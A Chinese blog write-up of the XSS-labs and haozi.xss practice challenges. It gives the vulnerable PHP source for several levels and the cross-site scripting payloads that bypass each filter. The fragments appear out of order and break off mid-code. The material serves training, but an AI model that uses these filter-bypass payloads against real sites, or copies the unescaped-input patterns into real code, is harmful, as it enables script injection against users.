class="tag"></<span class="name">center</span>></span></span><br><span class="line"><span class="meta"><?php </span></span><br><span class="line"><span class="meta">echo "<h3 align=center>payload的长度:".strlen($str5)."</h3>";</span></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="tag"></<span class="name">body</span>></span></span><br><span class="line"><span class="tag"></<span class="name">html</span>></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 17</p> <p>查看网页源代码可知有两个参数arg01和arg02,进行尝试后发现会拼接在<embed>标签内,有src属性</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204142001519.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204142001519.png" alt="image-20240204142001519" ></a></p> <p>可以构造以下payload</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204142237099.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204142237099.png" alt="image-20240204142237099" ></a></p> <p><strong>答案:<code>arg01=a&arg02= onMouseOver=alert(1)</code></strong></p> </li> <li> <p>Level 18</p> <p>本题与17题一致,payload相同</p> </li> </ul> <h3 id="haozi-xss题解">haozi.xss题解</h3> <p>网址: <a class="link" href="https://xss.haozi.me/" >https://xss.haozi.me/<i class="fas fa-external-link-alt"></i></a></p> <ul> <li> <h4 id="0x00">0x00</h4> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204143959934.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204143959934.png" alt="image-20240204143959934" ></a></p> </li> </ul> <p><strong>答案:<code><script>alert(1)</script></code></strong></p> <ul> <li> <h4 id="0x01">0x01</h4> <p>注入点在<textarea></textarea>标签中,故按照0x00的方法无法被解析,可提前闭合标签。</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204144343303.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204144343303.png" alt="image-20240204144343303" ></a></p> <p><strong>答案:<code></textarea><script>alert(1)</script></code></strong></p> <p>也可以利用error事件:<code></textarea><img src="" onerror=alert(1)></code>,由于src是空,所以肯定会报错,,故通过错误调用事件成功注入</p> </li> <li> <h4 id="0x02">0x02</h4> <p>本题input标签内的value会将值转化为字符串,然后显示在输入框内,故前两题的标签闭合注入会失效,可以借鉴SQL注入的方法,将前面的双引号闭合,然后注入新的标签</p> <p>答案:<code>" > <script>alert(1)</script></code></p> <p>也可以使用onclick事件:</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204144832842.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204144832842.png" alt="image-20240204144832842" ></a></p> <p><strong>答案:<code>" onclick="alert(1)</code></strong></p> </li> <li> <h4 id="0x03">0x03</h4> <p>过滤符号:<code>() <></code> ,在JavaScript中可以使用反引号`` <code>来代替</code>()`</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204150455947.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204150455947.png" alt="image-20240204150455947" ></a></p> <p><strong>答案:<code><script>alert</code>1<code></script></code></strong></p> <p>或:</p> <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">a</span> <span class="attr">href</span>=<span class="string">javascript:alert</span>`<span class="attr">1</span>\`></span>123<span class="tag"></<span class="name">a</span>></span></span><br></pre></td></tr></table></figure> </li> <li> <h4 id="0x04">0x04</h4> <p>过滤符号:小括号(),中括号[],反引号` 可使用HTML实体编码绕过</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204151017389.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204151017389.png" alt="image-20240204151017389" ></a></p> <p><strong>答案:</strong></p> <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">a</span> <span class="attr">href</span>=<span class="string">javascript:alert&#40;1&#41;</span>></span>123<span class="tag"></<span class="name">a</span>></span></span><br></pre></td></tr></table></figure> </li> <li> <h4 id="0x05">0x05</h4> <p>HTML的注释有两种方式:</p> <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"><!-- 注释内容 --></span></span><br><span class="line"><span class="comment"><!-- 注释内容 --!></span></span><br></pre></td></tr></table></figure> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204151215313.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204151215313.png" alt="image-20240204151215313" ></a></p> <p><strong>答案:<code>--!><script>alert(1)</script></code></strong></p> </li> <li> <h4 id="0x06">0x06</h4> <p>正则表达式匹配了:<strong>auto</strong> 、<strong>以on开头且以=结尾的字符串</strong>、 <strong>></strong></p> <p>所以过滤了autofocus和onerror等事件,以及防止input标签被闭合。</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204152604165.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204152604165.png" alt="image-20240204152604165" ></a></p> <p>可以通过换行<code>%0A</code>来绕过匹配,<strong>答案:</strong></p> <figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">type="image" src="" onerror</span><br><span class="line">=alert(1)</span><br><span class="line"></span><br><span class="line">onclick</span><br><span class="line">=alert(1)</span><br></pre></td></tr></table></figure> </li> <li> <h4 id="0x07">0x07</h4> <p>本题主要利用html部分单标签可以解析,例如img标签</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204153048091.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204153048091.png" alt="image-20240204153048091" ></a></p> <p><strong>答案:<code><img src="" onerror=alert(1)</code></strong></p> </li> <li> <h4 id="0x08">0x08</h4> <p>使用正则过滤</style>,可以多加一个空格或使用换行符造成正则逃逸。</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204153220204.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204153220204.png" alt="image-20240204153220204" ></a></p> <p><strong>答案:<code></style ><img src=1 onerror="alert(1)"</code></strong></p> </li> <li> <h4 id="0x09">0x09</h4> <p>本题使用正则表达式白名单匹配固定网址,可在正确的网址后多加字符,再把前面的双引号闭合,再输入onerror错误事件</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204153430571.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204153430571.png" alt="image-20240204153430571" ></a></p> <p><strong>答案:<code>https://www.segmentfault.com" onerror="alert(1)</code></strong></p> </li> <li> <h4 id="0x0A">0x0A</h4> <p>本题通过html转义, 过滤了所有可注入的关键字,经研究(看答案)可知,可直接引用指定网站下的目录文件来达到xss注入的目的,如在靶场的目录下有个j.js文件, 内有alert(1);代码, 直接调用即可注入,<strong>答案:<code>https://www.segmentfault.com.haozi.me/j.js</code></strong></p> <p>也可用url的@语法来进行跳转调用,例如<code>https://www.baidu.com@www.bing.com</code> ,最终会跳转到bing上,根据此原理可以在其他服务器上事先写好alert(1);并跳转执行。</p> </li> <li> <h4 id="0x0B">0x0B</h4> </li> <li> <h4 id="0x0C">0x0C</h4> </li> <li> <h4 id="0x0D">0x0D</h4> </li> <li> <h4 id="0x0E">0x0E</h4> </li> <li> <h4 id="0x0F">0x0F</h4> </li> <li> <h4 id="0x10">0x10</h4> </li> <li> <h4 id="0x11">0x11</h4> </li> <li> <h4 id="0x12">0x12</h4> </li> </ul>
    • © 2023 - 2024    C3ngH
    访客数 访问量
    1. XSS-labs题解
  • 标签内,而例如、等标签内均可插入标签来执行JavaScript恶意代码</p> <p>此处可以参考:<a class="link" href="https://blog.csdn.net/LYJ20010728/article/details/116462782" >XSS常见的触发标签<i class="fas fa-external-link-alt"></i></a></p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202143032203.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202143032203.png" alt="image-20240202143032203" ></a></p> <p><strong>答案:<code><script>alert(1)</script></code></strong></p> <p>源代码:</p> <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><!DOCTYPE <span class="keyword">html</span>></span><span class="comment"><!--STATUS OK--></span><span class="tag"><<span class="name">html</span>></span></span><br><span class="line"><span class="tag"><<span class="name">head</span>></span></span><br><span class="line"><span class="tag"><<span class="name">meta</span> <span class="attr">http-equiv</span>=<span class="string">"content-type"</span> <span class="attr">content</span>=<span class="string">"text/html;charset=utf-8"</span>></span></span><br><span class="line"><span class="tag"><<span class="name">script</span>></span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript"><span class="variable language_">window</span>.<span class="property">alert</span> = <span class="keyword">function</span>(<span class="params"></span>) </span></span><br><span class="line"><span class="language-javascript">{ </span></span><br><span class="line"><span class="language-javascript"><span class="title function_">confirm</span>(<span class="string">"完成的不错!"</span>);</span></span><br><span class="line"><span class="language-javascript"> <span class="variable language_">window</span>.<span class="property">location</span>.<span class="property">href</span>=<span class="string">"level2.php?keyword=test"</span>; </span></span><br><span class="line"><span class="language-javascript">}</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag"></<span class="name">script</span>></span></span><br><span class="line"><span class="tag"><<span class="name">title</span>></span>欢迎来到level1<span class="tag"></<span class="name">title</span>></span></span><br><span class="line"><span class="tag"></<span class="name">head</span>></span></span><br><span class="line"><span class="tag"><<span class="name">body</span>></span></span><br><span class="line"><span class="tag"><<span class="name">h1</span> <span class="attr">align</span>=<span class="string">center</span>></span>欢迎来到level1<span class="tag"></<span class="name">h1</span>></span></span><br><span class="line"><span class="meta"><?php </span></span><br><span class="line"><span class="meta">ini_set("display_errors", 0);</span></span><br><span class="line"><span class="meta">$str = $_GET["name"];</span></span><br><span class="line"><span class="meta">echo "<h2 align=center>欢迎用户".$str."</h2>";//这里直接进行调用,根本没有过滤</span></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="tag"><<span class="name">center</span>></span><span class="tag"><<span class="name">img</span> <span class="attr">src</span>=<span class="string">level1.png</span>></span><span class="tag"></<span class="name">center</span>></span></span><br><span class="line"><span class="meta"><?php </span></span><br><span class="line"><span class="meta">echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";</span></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="tag"></<span class="name">body</span>></span></span><br><span class="line"><span class="tag"></<span class="name">html</span>></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 2</p> <p>可以尝试如Level 1的方法但是没有成功,再次查看源代码发现第一处的<>符号被html实体转义,只能从第二处进行注入,input标签不可内含script标签,故此处提前闭合input标签,构造一个新的script标签执行恶意代码。<a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/1706856310681.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/1706856310681.png" alt="1706856310681" ></a></p> <p><strong>答案:<code>">\<script>alert(1)\</script></code></strong></p> <p>源代码:</p> <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><!DOCTYPE <span class="keyword">html</span>></span><span class="comment"><!--STATUS OK--></span><span class="tag"><<span class="name">html</span>></span></span><br><span class="line"><span class="tag"><<span class="name">head</span>></span></span><br><span class="line"><span class="tag"><<span class="name">meta</span> <span class="attr">http-equiv</span>=<span class="string">"content-type"</span> <span class="attr">content</span>=<span class="string">"text/html;charset=utf-8"</span>></span></span><br><span class="line"><span class="tag"><<span class="name">script</span>></span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript"><span class="variable language_">window</span>.<span class="property">alert</span> = <span class="keyword">function</span>(<span class="params"></span>) </span></span><br><span class="line"><span class="language-javascript">{ </span></span><br><span class="line"><span class="language-javascript"><span class="title function_">confirm</span>(<span class="string">"完成的不错!"</span>);</span></span><br><span class="line"><span class="language-javascript"> <span class="variable language_">window</span>.<span class="property">location</span>.<span class="property">href</span>=<span class="string">"level3.php?writing=wait"</span>; </span></span><br><span class="line"><span class="language-javascript">}</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag"></<span class="name">script</span>></span></span><br><span class="line"><span class="tag"><<span class="name">title</span>></span>欢迎来到level2<span class="tag"></<span class="name">title</span>></span></span><br><span class="line"><span class="tag"></<span class="name">head</span>></span></span><br><span class="line"><span class="tag"><<span class="name">body</span>></span></span><br><span class="line"><span class="tag"><<span class="name">h1</span> <span class="attr">align</span>=<span class="string">center</span>></span>欢迎来到level2<span class="tag"></<span class="name">h1</span>></span></span><br><span class="line"><span class="meta"><?php </span></span><br><span class="line"><span class="meta">ini_set("display_errors", 0);</span></span><br><span class="line"><span class="meta">$str = $_GET["keyword"];</span></span><br><span class="line"><span class="meta">echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center></span></span><br><span class="line"><span class="meta"><form action=level2.php method=GET></span></span><br><span class="line"><span class="meta"><input name=keyword value="'.$str.'"></span></span><br><span class="line"><span class="meta"><input type=submit name=submit value="搜索"/></span></span><br><span class="line"><span class="meta"></form></span></span><br><span class="line"><span class="meta"></center>';</span></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="tag"><<span class="name">center</span>></span><span class="tag"><<span class="name">img</span> <span class="attr">src</span>=<span class="string">level2.png</span>></span><span class="tag"></<span class="name">center</span>></span></span><br><span class="line"><span class="meta"><?php </span></span><br><span class="line"><span class="meta">echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";</span></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="tag"></<span class="name">body</span>></span></span><br><span class="line"><span class="tag"></<span class="name">html</span>></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 3</p> <p>如下图所示,本题过滤了<>和",经过测试发现 ’ 未被过滤,则可以在input标签内内联JavaScript代码</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202144949589.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202144949589.png" alt="img" ></a></p> <p><strong>答案:<code>' onclick='alert(1)</code></strong>,然后使用鼠标单击该输入框即可</p> <p>源代码:</p> <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><!DOCTYPE <span class="keyword">html</span>></span><span class="comment"><!--STATUS OK--></span><span class="tag"><<span class="name">html</span>></span></span><br><span class="line"><span class="tag"><<span class="name">head</span>></span></span><br><span class="line"><span class="tag"><<span class="name">meta</span> <span class="attr">http-equiv</span>=<span class="string">"content-type"</span> <span class="attr">content</span>=<span class="string">"text/html;charset=utf-8"</span>></span></span><br><span class="line"><span class="tag"><<span class="name">script</span>></span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript"><span class="variable language_">window</span>.<span class="property">alert</span> = <span class="keyword">function</span>(<span class="params"></span>) </span></span><br><span class="line"><span class="language-javascript">{ </span></span><br><span class="line"><span class="language-javascript"><span class="title function_">confirm</span>(<span class="string">"完成的不错!"</span>);</span></span><br><span class="line"><span class="language-javascript"> <span class="variable language_">window</span>.<span class="property">location</span>.<span class="property">href</span>=<span class="string">"level4.php?keyword=try harder!"</span>; </span></span><br><span class="line"><span class="language-javascript">}</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag"></<span class="name">script</span>></span></span><br><span class="line"><span class="tag"><<span class="name">title</span>></span>欢迎来到level3<span class="tag"></<span class="name">title</span>></span></span><br><span class="line"><span class="tag"></<span class="name">head</span>></span></span><br><span class="line"><span class="tag"><<span class="name">body</span>></span></span><br><span class="line"><span class="tag"><<span class="name">h1</span> <span class="attr">align</span>=<span class="string">center</span>></span>欢迎来到level3<span class="tag"></<span class="name">h1</span>></span></span><br><span class="line"><span class="meta"><?php </span></span><br><span class="line"><span class="meta">ini_set("display_errors", 0);</span></span><br><span class="line"><span class="meta">$str = $_GET["keyword"];</span></span><br><span class="line"><span class="meta">echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center></span></span><br><span class="line"><span class="meta"><form action=level3.php method=GET></span></span><br><span class="line"><span class="meta"><input name=keyword value='".htmlspecialchars($str)."'></span></span><br><span class="line"><span class="meta"><input type=submit name=submit value=搜索 /></span></span><br><span class="line"><span class="meta"></form></span></span><br><span class="line"><span class="meta"></center>";</span></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="tag"><<span class="name">center</span>></span><span class="tag"><<span class="name">img</span> <span class="attr">src</span>=<span class="string">level3.png</span>></span><span class="tag"></<span class="name">center</span>></span></span><br><span class="line"><span class="meta"><?php </span></span><br><span class="line"><span class="meta">echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";</span></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="tag"></<span class="name">body</span>></span></span><br><span class="line"><span class="tag"></<span class="name">html</span>></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 4</p> <p>与Level 3相同,注意使用的是双引号即可</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202145526384.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202145526384.png" alt="image-20240202145526384" ></a></p> <p><strong>答案:<code>" onclick="alert(1)</code></strong></p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="variable">$_GET</span>[<span class="string">"keyword"</span>];</span><br><span class="line"><span class="variable">$str2</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">">"</span>,<span class="string">""</span>,<span class="variable">$str</span>);</span><br><span class="line"><span class="variable">$str3</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"<"</span>,<span class="string">""</span>,<span class="variable">$str2</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form action=level4.php method=GET></span></span><br><span class="line"><span class="string"><input name=keyword value="'</span>.<span class="variable">$str3</span>.<span class="string">'"></span></span><br><span class="line"><span class="string"><input type=submit name=submit value=搜索 /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><center><img src=level4.png></center></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h3 align=center>payload的长度:"</span>.<span class="title function_ invoke__">strlen</span>(<span class="variable">$str3</span>).<span class="string">"</h3>"</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 5</p> <p>本题在先前基础上过滤了关键字 on ,使得所有带on的方法都不可使用,故使用伪协议构造<a href=></p> <p><strong>若过滤是被替换为空,则可进行双写绕过,若是增加下划线等破坏原有结构则需使用其他方法绕过</strong></p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/e51d1669fc381c1c00e22113b0f8bea.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/e51d1669fc381c1c00e22113b0f8bea.png" alt="e51d1669fc381c1c00e22113b0f8bea" ></a></p> <p><strong>答案:<code>"><a href="[javascript:alert(1)](about:blank)">123</a>//</code></strong>,其中//为注释后面的内容</p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="title function_ invoke__">strtolower</span>(<span class="variable">$_GET</span>[<span class="string">"keyword"</span>]);</span><br><span class="line"><span class="variable">$str2</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"<script"</span>,<span class="string">"<scr_ipt"</span>,<span class="variable">$str</span>);</span><br><span class="line"><span class="variable">$str3</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"on"</span>,<span class="string">"o_n"</span>,<span class="variable">$str2</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form action=level5.php method=GET></span></span><br><span class="line"><span class="string"><input name=keyword value="'</span>.<span class="variable">$str3</span>.<span class="string">'"></span></span><br><span class="line"><span class="string"><input type=submit name=submit value=搜索 /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><center><img src=level5.png></center></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h3 align=center>payload的长度:"</span>.<span class="title function_ invoke__">strlen</span>(<span class="variable">$str3</span>).<span class="string">"</h3>"</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 6</p> <p>本题用增加下划线的方式过滤href标签,可采用大小写绕过</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202153331833.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202153331833.png" alt="image-20240202153331833" ></a></p> <p><strong>答案<code>"><a HREF="javascript:alert(1)">1</a>//</code></strong></p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="variable">$_GET</span>[<span class="string">"keyword"</span>];</span><br><span class="line"><span class="variable">$str2</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"<script"</span>,<span class="string">"<scr_ipt"</span>,<span class="variable">$str</span>);</span><br><span class="line"><span class="variable">$str3</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"on"</span>,<span class="string">"o_n"</span>,<span class="variable">$str2</span>);</span><br><span class="line"><span class="variable">$str4</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"src"</span>,<span class="string">"sr_c"</span>,<span class="variable">$str3</span>);</span><br><span class="line"><span class="variable">$str5</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"data"</span>,<span class="string">"da_ta"</span>,<span class="variable">$str4</span>);</span><br><span class="line"><span class="variable">$str6</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"href"</span>,<span class="string">"hr_ef"</span>,<span class="variable">$str5</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form action=level6.php method=GET></span></span><br><span class="line"><span class="string"><input name=keyword value="'</span>.<span class="variable">$str6</span>.<span class="string">'"></span></span><br><span class="line"><span class="string"><input type=submit name=submit value=搜索 /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><center><img src=level6.png></center></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h3 align=center>payload的长度:"</span>.<span class="title function_ invoke__">strlen</span>(<span class="variable">$str6</span>).<span class="string">"</h3>"</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 7</p> <p>本题以删除的方式过滤了href和script,可以使用双写绕过</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202154250121.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202154250121.png" alt="image-20240202154250121" ></a></p> <p><strong>答案:<code>"><a HRHREFEF="javascrscriptipt:alert(1)">1</a>//</code></strong></p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> =<span class="title function_ invoke__">strtolower</span>( <span class="variable">$_GET</span>[<span class="string">"keyword"</span>]);</span><br><span class="line"><span class="variable">$str2</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"script"</span>,<span class="string">""</span>,<span class="variable">$str</span>);</span><br><span class="line"><span class="variable">$str3</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"on"</span>,<span class="string">""</span>,<span class="variable">$str2</span>);</span><br><span class="line"><span class="variable">$str4</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"src"</span>,<span class="string">""</span>,<span class="variable">$str3</span>);</span><br><span class="line"><span class="variable">$str5</span>=<span class="title function_ 